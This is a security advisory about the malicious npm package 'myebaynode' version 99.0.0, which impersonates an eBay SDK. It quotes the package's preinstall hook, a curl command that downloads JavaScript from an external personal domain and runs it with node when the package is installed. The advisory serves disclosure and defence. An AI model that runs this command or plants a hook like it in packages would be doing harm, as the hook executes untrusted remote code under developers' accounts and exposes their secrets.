npm · Malicious package advisory
Malwaremyebaynode
MAL-2026-6296
Malicious code in myebaynode (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3) package.json declares a preinstall lifecycle hook that runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`, fetching JavaScript from an external, mutable, personal domain and immediately executing it under the installer's user account on `npm install`. The fetched payload is unpinned (no hash or signature verification), can be changed by the host's owner at any time, and runs with full filesystem and network access of the installing user. The package name 'myebaynode' with description 'Ebay Node Package', version 99.0.0, and minimal metadata (author 'aman', no repository) suggests brand-impersonation intended to lure developers searching for an eBay SDK.
Compromised versions (1)
- 99.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.